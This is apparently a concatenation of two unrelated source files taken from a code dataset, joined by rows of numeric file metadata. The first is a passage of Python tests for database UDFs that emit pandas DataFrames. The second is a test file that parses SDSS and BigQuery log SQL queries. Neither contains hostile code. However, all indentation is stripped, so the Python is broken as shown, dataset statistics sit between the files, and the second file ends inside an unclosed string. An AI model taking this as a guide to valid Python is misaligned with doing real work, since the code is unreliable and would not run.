output_columns = 'X1 VARCHAR(5), X2 VARCHAR(5), X3 VARCHAR(5), X4 VARCHAR(5), X5 VARCHAR(5), X6 VARCHAR(5), X7 VARCHAR(5), X8 VARCHAR(5), X9 VARCHAR(5), X10 VARCHAR(5), X11 VARCHAR(5)'
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
while True:
df = ctx.get_dataframe(num_rows=1)
if df is None:
break
ctx.emit(*(df.columns.tolist()))
/
''' % (self.col_defs_str, output_columns))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([tuple(self.col_names)]*self.num_rows, rows)
def test_dataframe_set_emits_unique(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(C0 INT)
EMITS(C0 INT) AS
import numpy as np
def run(ctx):
while True:
df = ctx.get_dataframe(num_rows=1)
if df is None:
break
ctx.emit(np.asscalar(df.C0))
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(C0) FROM FN2.TEST1'
print(select_sql)
rows = self.query(select_sql)
self.assertEqual(self.num_rows, len(set([x[0] for x in rows])))
def test_dataframe_set_emits_all_unique(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(C0 INT)
EMITS(C0 INT) AS
import numpy as np
def run(ctx):
while True:
df = ctx.get_dataframe(num_rows="all")
if df is None:
break
for i in range(df.shape[0]):
ctx.emit(np.asscalar(df.iloc[i, 0]))
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(C0) FROM FN2.TEST1'
print(select_sql)
rows = self.query(select_sql)
self.assertEqual(self.num_rows, len(set([x[0] for x in rows])))
def test_dataframe_set_emits_empty(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
import pandas as pd
def run(ctx):
df = pd.DataFrame()
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'emit DataFrame is empty'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits_wrong_args0(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
import pandas as pd
def run(ctx):
df = pd.DataFrame([[]])
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'emit\(\) takes exactly 11 arguments \(0 given\)'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits_wrong_args7(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows="all")
df = df.iloc[:, 1:]
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'emit\(\) takes exactly 11 arguments \(10 given\)'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits_numrows_not_all(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows="some")
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'get_dataframe\(\) parameter'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits_numrows_not_int(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows=True)
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'get_dataframe\(\) parameter'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits_numrows_zero(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows=0)
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'get_dataframe\(\) parameter'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits_numrows_negative(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows=-1)
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, "get_dataframe\(\) parameter"):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
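# Rows containing NULLs (self.col_tuple_null in FN2.TEST2) must round-trip through the DataFrame unchanged.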
def test_dataframe_scalar_emits_null(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe()
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST2' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple_1, self.col_tuple_2, self.col_tuple_null], rows)
def test_dataframe_set_emits_null(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows='all')
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST2' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple_1, self.col_tuple_2, self.col_tuple_null], rows)
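# start_col=2 skips the first two input columns, so only columns 2 and onward are declared and emitted.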
def test_dataframe_scalar_emits_start_col(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(start_col=2)
ctx.emit(df)
/
''' % (self.col_defs_str, ','.join('%s %s'%t for t in self.col_defs[2:])))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST2' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple_1[2:], self.col_tuple_2[2:], self.col_tuple_null[2:]], rows)
def test_dataframe_set_emits_null_start_col(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows='all', start_col=5)
ctx.emit(df)
/
''' % (self.col_defs_str, ','.join('%s %s'%t for t in self.col_defs[5:])))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST2' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple_1[5:], self.col_tuple_2[5:], self.col_tuple_null[5:]], rows)
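# start_col must be a non-negative integer; a negative value is rejected.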
def test_dataframe_set_emits_null_start_col_negative(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows='all', start_col=-1)
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, "must be an integer >= 0"):
select_sql = 'SELECT foo(%s) FROM FN2.TEST2' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
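# A start_col beyond the number of input columns is reported together with the actual column count.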
def test_dataframe_set_emits_null_start_col_too_large(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows='all', start_col=100000)
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, "is 100000, but there are only %d input columns" % len(self.col_names)):
select_sql = 'SELECT foo(%s) FROM FN2.TEST2' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
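# pandas datetimes have nanosecond resolution, but emitted TIMESTAMP values keep only millisecond precision: 673251 microseconds are truncated to 673000.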
def test_dataframe_set_emits_timestamp_truncate_nanoseconds_only(self):
import datetime
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT foo(sec int) EMITS (ts timestamp) AS
def run(ctx):
import pandas as pd
import numpy as np
import datetime
c1=np.empty(shape=(2),dtype=np.object_)
c1[:]=datetime.datetime(2020, 7, 27, 14, 22, 33, 673251)
#c1[:]=datetime.datetime(2020, 7, 27, 14, 22, 33, 673000, tzinfo=datetime.timezone(datetime.timedelta(0, 3600)))
#c1[:]=datetime.datetime(2020, 7, 27, 14, 22, 33, tzinfo=datetime.timezone(datetime.timedelta(0, 3600)))
#c1[:]=datetime.datetime(1970, 1, 1, 0, 20, 35)
#c1[:]="2020-07-27 14:22:33.600699"
df=pd.DataFrame({0:c1})
df[0]=pd.to_datetime(df[0])
ctx.emit(df)
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(1)'
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual(
[
(datetime.datetime(2020, 7, 27, 14, 22, 33, 673000),),
(datetime.datetime(2020, 7, 27, 14, 22, 33, 673000),)
], rows)
def test_dataframe_set_emits_timestamp_milliseconds_only(self):
import datetime
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT foo(sec int) EMITS (ts timestamp) AS
def run(ctx):
import pandas as pd
import numpy as np
import datetime
c1=np.empty(shape=(2),dtype=np.object_)
c1[:]=datetime.datetime(2020, 7, 27, 14, 22, 33, 673000)
df=pd.DataFrame({0:c1})
df[0]=pd.to_datetime(df[0])
ctx.emit(df)
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(1)'
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual(
[
(datetime.datetime(2020, 7, 27, 14, 22, 33, 673000),),
(datetime.datetime(2020, 7, 27, 14, 22, 33, 673000),)
], rows)
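# Timezone-aware datetimes cannot be emitted into a TIMESTAMP column and raise F-UDF-CL-SL-PYTHON-1138.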
def test_dataframe_set_emits_timestamp_with_timezone_only_fail(self):
import datetime
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT foo(sec int) EMITS (ts timestamp) AS
def run(ctx):
import pandas as pd
import numpy as np
import datetime
c1=np.empty(shape=(2),dtype=np.object_)
c1[:]=datetime.datetime(2020, 7, 27, 14, 22, 33, 673000, tzinfo=datetime.timezone(datetime.timedelta(0, 3600)))
df=pd.DataFrame({0:c1})
df[0]=pd.to_datetime(df[0])
ctx.emit(df)
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(1)'
print(select_sql)
with self.assertRaisesRegexp(Exception, "F-UDF-CL-SL-PYTHON-1138"):
rows = self.query(select_sql)
def test_dataframe_set_emits_pystring_only(self):
import datetime
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT foo(sec int) EMITS (ts VARCHAR(20000)) AS
def run(ctx):
import pandas as pd
import numpy as np
import datetime
c1=np.empty(shape=(2),dtype=np.object_)
c1[:]='abcdefgh '
df=pd.DataFrame({0:c1})
ctx.emit(df)
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(1)'
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual(
[
('abcdefgh ',),
('abcdefgh ',)
], rows)
def test_dataframe_set_emits_pyint_only(self):
import datetime
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT foo(sec int) EMITS (ts int) AS
def run(ctx):
import pandas as pd
import numpy as np
import datetime
c1=np.empty(shape=(2),dtype=np.object_)
c1[:]=234
df=pd.DataFrame({0:c1})
ctx.emit(df)
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(1)'
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual(
[
(234,),
(234,)
], rows)
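# Python floats in an object-dtype column are not yet supported for DOUBLE output (see TODO below) and currently raise F-UDF-CL-SL-PYTHON-1056.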
def test_dataframe_set_emits_double_pyfloat_only_todo(self):
import datetime
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT foo(sec int) EMITS (ts double) AS
def run(ctx):
import pandas as pd
import numpy as np
import datetime
c1=np.empty(shape=(2),dtype=np.object_)
c1[:]=234.5
df=pd.DataFrame({0:c1})
ctx.emit(df)
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(1)'
print(select_sql)
#TODO implement support
with self.assertRaisesRegexp(Exception, 'F-UDF-CL-SL-PYTHON-1056'):
rows = self.query(select_sql)
def test_dataframe_set_emits_double_npfloat32_only(self):
import datetime
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT foo(sec int) EMITS (ts double) AS
def run(ctx):
import pandas as pd
import numpy as np
import datetime
c1=np.empty(shape=(2),dtype=np.float64)
c1[:]=234.5
df=pd.DataFrame({0:c1})
ctx.emit(df)
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(1)'
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual(
[
(234.5,),
(234.5,)
], rows)
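# Emit 1000 DataFrames of 1000 rows each; the test only checks that the large emit completes without error.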
def test_dataframe_set_emits_timestamp_milliseconds_only_large_emit(self):
import datetime
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT foo(sec int) EMITS (ts timestamp) AS
def run(ctx):
import pandas as pd
import numpy as np
import datetime
for i in range(1000):
c1=np.empty(shape=(1000),dtype=np.object_)
c1[:]=datetime.datetime(2020, 7, 27, 14, 22, 33, 673000)
df=pd.DataFrame({0:c1})
df[0]=pd.to_datetime(df[0])
ctx.emit(df)
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(1)'
print(select_sql)
rows = self.query(select_sql)
if __name__ == '__main__':
udf.main()
# vim: ts=4:sts=4:sw=4:et:fdm=indent
| 34.947791
| 192
| 0.522495
| 4,205
| 34,808
| 4.112961
| 0.062069
| 0.052616
| 0.036253
| 0.039665
| 0.892628
| 0.874241
| 0.852905
| 0.848916
| 0.83394
| 0.813819
| 0
| 0.041944
| 0.365749
| 34,808
| 995
| 193
| 34.982915
| 0.74145
| 0.002298
| 0
| 0.731792
| 0
| 0.006936
| 0.453346
| 0.058029
| 0
| 0
| 0
| 0.001005
| 0.043931
| 1
| 0.050867
| false
| 0
| 0.062428
| 0
| 0.116763
| 0.092486
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d57b5f5f39fd42d12b117ea204de6172decd6272
| 15,203
|
py
|
Python
|
src/engine/test_qlogs.py
|
Anniversor/databass-public
|
e69e5ff4b2d1bfb630ac81703eea7c2d24f29218
|
[
"MIT"
] | 1
|
2018-12-23T00:14:46.000Z
|
2018-12-23T00:14:46.000Z
|
src/engine/test_qlogs.py
|
wesleytao/databass-public
|
21df8859a00daf6b199f79623ffc184cba2918a1
|
[
"MIT"
] | null | null | null |
src/engine/test_qlogs.py
|
wesleytao/databass-public
|
21df8859a00daf6b199f79623ffc184cba2918a1
|
[
"MIT"
] | null | null | null |
import unittest
#import StringIO
#import pandas
import tempfile
import os.path
import interpretor
import optimizer
import ops
import db
from interpretor import PullBasedInterpretor
from optimizer import Optimizer
from ops import Limit
from db import Database
from parse_sql import parse
import pandas.util.testing as pdt
db = Database()
opt = Optimizer(db)
interp = PullBasedInterpretor(db)
class TestUnits(unittest.TestCase):
"""Basic unit testing"""
def test_parse_sdss_queries(self):
querytext = """SELECT top 1 p.objID, p.run, p.rerun, p.camcol, p.field, p.obj, p.type, p.ra, p.dec, p.u,p.g,p.r,p.i,p.z, p.Err_u, p.Err_g, p.Err_r,p.Err_i,p.Err_z FROM fGetNearbyObjEq(195,2.5,0.5) n, PhotoPrimary p WHERE n.objID=p.objID
SELECT top 1 p.objID, p.run, p.rerun, p.camcol, p.field, p.obj, p.type, p.ra, p.dec, p.u,p.g,p.r,p.i,p.z, p.Err_u, p.Err_g, p.Err_r,p.Err_i,p.Err_z FROM fGetNearbyObjEq(195,2.5,0.5) n, PhotoPrimary p WHERE n.objID=p.objID
SELECT top 1 p.objID, p.run, p.rerun, p.camcol, p.field, p.obj, p.type, p.ra, p.dec, p.u,p.g,p.r,p.i,p.z, p.Err_u, p.Err_g, p.Err_r,p.Err_i,p.Err_z FROM fGetNearbyObjEq(195,2.5,0.5) n, PhotoPrimary p WHERE n.objID=p.objID
SELECT top 1 p.objID, p.run, p.rerun, p.camcol, p.field, p.obj, p.type, p.ra, p.dec, p.u,p.g,p.r,p.i,p.z, p.Err_u, p.Err_g, p.Err_r,p.Err_i,p.Err_z FROM fGetNearbyObjEq(195,2.5,0.5) n, PhotoPrimary p WHERE n.objID=p.objID
SELECT count(g.objID) FROM Galaxy as g, dbo.fGetNearbyObjEq( 115.866 , 40.5354 , 1.6894005 ) as d WHERE d.objID = g.objID
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469062987925
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007004167733433
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007004168192115
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007004168192128
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063053507
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007004168126653
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469600383058
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063446719
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063184604
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063381160
SELECT count(g.objID) FROM Galaxy as g, dbo.fGetNearbyObjEq( 115.866 , 40.5354 , 1.1262669 ) as d WHERE d.objID = g.objID
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007004168061134
SELECT top 1 p.objID, p.run, p.rerun, p.camcol, p.field, p.obj, p.type, p.ra, p.dec, p.u,p.g,p.r,p.i,p.z, p.Err_u, p.Err_g, p.Err_r,p.Err_i,p.Err_z FROM fGetNearbyObjEq(195,2.5,0.5) n, PhotoPrimary p WHERE n.objID=p.objID
SELECT top 1 p.objID, p.run, p.rerun, p.camcol, p.field, p.obj, p.type, p.ra, p.dec, p.u,p.g,p.r,p.i,p.z, p.Err_u, p.Err_g, p.Err_r,p.Err_i,p.Err_z FROM fGetNearbyObjEq(195,2.5,0.5) n, PhotoPrimary p WHERE n.objID=p.objID
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063249986
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725468526248106
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063184602
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003630796894
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725468526248085
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725468526182582
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003630862447
SELECT count(g.objID) FROM Galaxy as g, dbo.fGetNearbyObjEq( 115.866 , 40.5354 , 0.84470023 ) as d WHERE d.objID = g.objID
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003630862456
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725468526248118
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003631452342
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063774212
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063184628
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007004168192131
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063643301
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 587725469063643260
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003631321239
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003631386743
SELECT count(g.objID) FROM Galaxy as g, dbo.fGetNearbyObjEq( 115.866 , 40.5354 , 0.56313347 ) as d WHERE d.objID = g.objID
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003631321255
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003631059105
select rowc_g,colc_g from BESTDR3..PhotoPrimary where objID = 588007003630993526"""
for q in querytext.split("\n"):
try:
plan = parse(q)
except Exception as e:
print(q)
print()
raise e
def test_parse_evan_queries_easy(self):
querytext = """
SELECT DISTINCT(httpRequest.status)
FROM `bluecore-qa.app_engine_logs.appengine_googleapis_com_request_log_20170915`
LIMIT 1000
SELECT protoPayload.startTime, protoPayload.method, protoPayload.resource, protoPayload.nickname
FROM [triggeredmail:app_engine_logs.appengine_googleapis_com_request_log_20170912]
WHERE protoPayload.nickname == 'evan.jones'
ORDER BY protoPayload.startTime
LIMIT 1000
SELECT protoPayload.startTime, protoPayload.method, protoPayload.resource, protoPayload.nickname
FROM [triggeredmail:app_engine_logs.appengine_googleapis_com_request_log_20170912]
WHERE protoPayload.resource LIKE '/api/rest/%/tjmaxx%' AND protoPayload.method != 'GET'
ORDER BY protoPayload.startTime
LIMIT 1000
SELECT protoPayload.startTime, lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_2017082*`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%Deadline exceeded%' AND protoPayload.moduleId = 'chrono-gae'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_2017082*`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%Deadline exceeded%' AND protoPayload.moduleId = 'chrono-gae'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170828`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%Deadline exceeded%' AND protoPayload.moduleId = 'chrono-gae'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170809`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%Deadline exceeded%' AND protoPayload.moduleId = 'chrono-gae'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170829`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%Deadline exceeded%' AND protoPayload.moduleId = 'chrono-gae'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170829`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%HTTPException%'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170829`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%HTTPException%' AND protoPayload.moduleId = 'chrono-gae'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170829`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%HTTPException: Deadline exceeded%' AND protoPayload.moduleId = 'chrono-gae'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170830`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%HTTPException: Deadline exceeded%' AND protoPayload.moduleId = 'chrono-gae'
LIMIT 1000
SELECT lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170830`, UNNEST(protoPayload.line) AS lines
WHERE lines.logMessage LIKE '%{"table_id":%'
SELECT
requestId,
UNIX_MICROS(timestamp) AS timestamp,
timestamp AS timeHuman,
message
FROM (
SELECT
protoPayload.requestId AS requestId,
lines.time AS timestamp,
lines.logMessage AS message
FROM
`triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170830` AS t,
UNNEST(t.protoPayload.line) AS lines
WHERE
protoPayload.moduleId LIKE '%bigquery%')
WHERE
message LIKE 'Ran out of tries%'
OR message LIKE '====%'
OR message LIKE '{"table_id"%'
ORDER BY
requestId
SELECT protoPayload.startTime, protoPayload.latency, protoPayload.resource, protoPayload.moduleId, protoPayload.instanceId
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170822`
WHERE protoPayload.latency>500 AND protoPayload.resource!="/_ah/background"
ORDER BY protoPayload.latency DESC
LIMIT 1000
SELECT protoPayload.startTime, protoPayload.latency, protoPayload.resource, protoPayload.moduleId
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170822`
WHERE protoPayload.latency>500 AND protoPayload.resource!="/_ah/background"
ORDER BY protoPayload.latency DESC
LIMIT 1000
SELECT protoPayload.startTime, protoPayload.latency, protoPayload.resource
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170822`
WHERE protoPayload.latency>500 AND protoPayload.resource!="/_ah/background"
LIMIT 1000
SELECT protoPayload.startTime, protoPayload.latency, protoPayload.resource
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170822`
WHERE protoPayload.latency>500 AND protoPayload.resource!="/background"
LIMIT 1000
SELECT lines.time, lines.logMessage
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_2017081*`, UNNEST(protoPayload.line) as lines
WHERE protoPayload.moduleId = 'integration-track' AND lower(lines.logMessage) LIKE '%overall deadline%'
LIMIT 1000
SELECT protoPayload.resource
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170824`
WHERE protoPayload.resource LIKE '/display_impression/%'
LIMIT 1000
SELECT httpRequest.requestUrl
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170824`
LIMIT 1000
SELECT httpRequest.requestUrl
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170824`
WHERE httpRequest.requestUrl LIKE '/display_impression/%'
LIMIT 1000
SELECT httpRequest.requestUrl
FROM `triggeredmail.app_engine_logs.appengine_googleapis_com_request_log_20170825`
WHERE httpRequest.requestUrl LIKE '/display_impression/%'
LIMIT 1000
SELECT httpRequest.requestUrl
FROM `bluecore-qa.app_engine_logs.appengine_googleapis_com_request_log_20170825`
WHERE httpRequest.requestUrl LIKE '/display_impression/%'
LIMIT 1000
SELECT protoPayload.line.time, LENGTH(protoPayload.line.logMessage)
FROM [bluecore-qa:app_engine_logs.appengine_googleapis_com_request_log_20170823]
WHERE protoPayload.resource='/wtf'
ORDER BY protoPayload.line.time DESC
LIMIT 1000
SELECT protoPayload.line.time, LENGTH(protoPayload.line.logMessage)
FROM [bluecore-qa:app_engine_logs.appengine_googleapis_com_request_log_20170823]
WHERE protoPayload.resource='/wtf'
ORDER BY protoPayload.line.time DESC
LIMIT 1000
SELECT protoPayload.line.time, LENGTH(protoPayload.line.logMessage)
FROM [bluecore-qa:app_engine_logs.appengine_googleapis_com_request_log_20170823]
WHERE protoPayload.resource='/wtf'
ORDER BY protoPayload.line.time
LIMIT 1000
SELECT protoPayload.line.time, LENGTH(protoPayload.line.logMessage)
FROM [bluecore-qa:app_engine_logs.appengine_googleapis_com_request_log_20170823]
WHERE protoPayload.resource='/wtf'
LIMIT 1000
SELECT COUNT(*) FROM `triggeredmail.coach.aggregate_purchase_201708`
WHERE order_id IS NULL OR order_id = ''
SELECT identified.count / aggregate.count AS ratio FROM (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.aggregate_viewed_product_201708`
) AS aggregate, (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.identified_viewed_product_201708`
) AS identified
SELECT COUNT(*) FROM `triggeredmail.coach.aggregate_purchase_201708`
WHERE order_id IS NULL OR order_id = ''
SELECT identified.count / aggregate.count AS ratio FROM (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.aggregate_viewed_product_201708`
) AS aggregate, (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.identified_viewed_product_201708`
) AS identified
SELECT COUNT(*) FROM `triggeredmail.coach.aggregate_purchase_201708`
WHERE order_id IS NULL OR order_id = ''
